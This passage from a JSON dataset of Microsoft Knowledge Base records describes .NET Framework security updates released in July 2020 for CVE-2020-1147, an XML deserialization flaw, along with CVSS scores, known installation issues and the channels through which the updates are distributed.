4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <https://go.microsoft.com/fwlink/?linkid=2132227>.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-1147](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1147>)\n\n## Known issues in some parts of this update\n\n**Symptom**| After you apply this update, some applications experience a **TypeInitializationException** exception when they try to deserialize **System.Data.DataSet** or **System.Data.DataTable** instances from the XML within a SQL CLR stored procedure. The stack trace for this exception appears as follows:System.TypeInitializationException: The type initializer for 'Scope' threw an exception. ---&gt; System.IO.FileNotFoundException: Could not load file or assembly 'System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' or one of its dependencies. The system cannot find the file specified. \nat System.Data.TypeLimiter.Scope.IsTypeUnconditionallyAllowed(Type type) \nat System.Data.TypeLimiter.Scope.IsAllowedType(Type type) \nat System.Data.TypeLimiter.EnsureTypeIsAllowed(Type type, TypeLimiter capturedLimiter) \n---|--- \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update.If you've already installed a previous release of the affected parts, no action is required. \n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.\n * The revocation function was unable to check revocation because the revocation server was offline. \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update.If you've already installed a previous release of the affected parts, no action is required. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4565579](<https://support.microsoft.com/help/4565579>) Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4565579)\n * [4565583](<https://support.microsoft.com/help/4565583>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565583)\n * [4565586](<https://support.microsoft.com/help/4565586>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565586)\n * [4565589](<https://support.microsoft.com/help/4565589>) Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4565589)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4566466)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T07:00:00", "id": "KB4566466", "href": "https://support.microsoft.com/en-us/help/4566466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:45:51", "description": "<html><body><p>July 14, 2020-KB4565629 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><table class=\"table\"> <tbody> <tr> <td> <strong>Release Channel</strong> </td> <td align=\"center\"> <strong>Available</strong> </td> <td> <strong>Next Step</strong> </td> </tr> <tr> <td>Windows Update and Microsoft Update</td> <td align=\"center\">Yes</td> <td>None. This update will be downloaded and installed automatically from Windows Update.</td> </tr> <tr> <td>Microsoft Update Catalog</td> <td align=\"center\">Yes</td> <td> To get the standalone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4565629\">Microsoft Update Catalog</a> website. </td> </tr> <tr> <td>Windows Server Update Services (WSUS)</td> <td align=\"center\">Yes</td> <td> <p> This update will automatically sync with WSUS if you configure <strong>Products and Classifications</strong> as follows: </p> <p> <strong>Product</strong>:Windows 10 Version 1703</p> <strong>Classification</strong>: Security Updates </td> </tr> </tbody> </table><p></p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/b/8/cb8598c1-afd2-4172-8c0a-b2df1dac13a9/4565629.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4565629 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:28", "id": "KB4565629", "href": "https://support.microsoft.com/en-us/help/4565629/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:39:07", "description": "<html><body><p>July 14, 2020-KB4565630 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><table class=\"table\"> <tbody> <tr> <td> <strong>Release Channel</strong> </td> <td align=\"center\"> <strong>Available</strong> </td> <td> <strong>Next Step</strong> </td> </tr> <tr> <td>Windows Update and Microsoft Update</td> <td align=\"center\">Yes</td> <td>None. This update will be downloaded and installed automatically from Windows Update.</td> </tr> <tr> <td>Microsoft Update Catalog</td> <td align=\"center\">Yes</td> <td> To get the standalone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4565630\">Microsoft Update Catalog</a> website. </td> </tr> <tr> <td>Windows Server Update Services (WSUS)</td> <td align=\"center\">Yes</td> <td> <p> This update will automatically sync with WSUS if you configure <strong>Products and Classifications</strong> as follows: </p> <p> <strong>Product</strong>:Windows 10 Version 1709</p> <strong>Classification</strong>: Security Updates </td> </tr> </tbody> </table><p></p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/b/8/cb8598c1-afd2-4172-8c0a-b2df1dac13a9/4565630.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4565630 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:27", "id": "KB4565630", "href": "https://support.microsoft.com/en-us/help/4565630/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:48:28", "description": "<html><body><p>July 14, 2020-KB4565633 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><table class=\"table\"> <tbody> <tr> <td> <strong>Release Channel</strong> </td> <td align=\"center\"> <strong>Available</strong> </td> <td> <strong>Next Step</strong> </td> </tr> <tr> <td>Windows Update and Microsoft Update</td> <td align=\"center\">Yes</td> <td>None. This update will be downloaded and installed automatically from Windows Update.</td> </tr> <tr> <td>Microsoft Update Catalog</td> <td align=\"center\">Yes</td> <td> To get the standalone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4565633\">Microsoft Update Catalog</a> website. </td> </tr> <tr> <td>Windows Server Update Services (WSUS)</td> <td align=\"center\">Yes</td> <td> <p> This update will automatically sync with WSUS if you configure <strong>Products and Classifications</strong> as follows: </p> <p> <strong>Product</strong>:Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909</p> <strong>Classification</strong>: Security Updates </td> </tr> </tbody> </table><p></p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/b/8/cb8598c1-afd2-4172-8c0a-b2df1dac13a9/4565633.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4565633 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:27", "id": "KB4565633", "href": "https://support.microsoft.com/en-us/help/4565633/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:29:38", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <https://go.microsoft.com/fwlink/?linkid=2132227>. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1147](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1147>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Known Issues\n\n**Symptoms:**After you apply this update, some applications experience a **TypeInitializationException** exception when they try to deserialize **System.Data.DataSet** or **System.Data.DataTable** instances from the XML within a SQL CLR stored procedure. The stack trace for this exception appears as follows:System.TypeInitializationException: The type initializer for 'Scope' threw an exception. ---&gt; System.IO.FileNotFoundException: Could not load file or assembly 'System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' or one of its dependencies. The system cannot find the file specified. \nat System.Data.TypeLimiter.Scope.IsTypeUnconditionallyAllowed(Type type) \nat System.Data.TypeLimiter.Scope.IsAllowedType(Type type) \nat System.Data.TypeLimiter.EnsureTypeIsAllowed(Type type, TypeLimiter capturedLimiter)**Resolution:**Install the latest version of this update that was released on October 13th, 2020.\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4565577](<https://support.microsoft.com/help/4565577>) Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4565577) \n * [4565582](<https://support.microsoft.com/help/4565582>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4565582) \n * [4565584](<https://support.microsoft.com/help/4565584>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4565584) \n * [4565587](<https://support.microsoft.com/help/4565587>) Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4565587) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4566467)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T07:00:00", "id": "KB4566467", "href": "https://support.microsoft.com/en-us/help/4566467", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:39:47", "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4566518)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4565610\" managed-link=\"\">4565610</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4565610)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565615\" managed-link=\"\">4565615</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4565615)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565621\" managed-link=\"\">4565621</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4565621)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565634\" managed-link=\"\">4565634</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4565634)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard 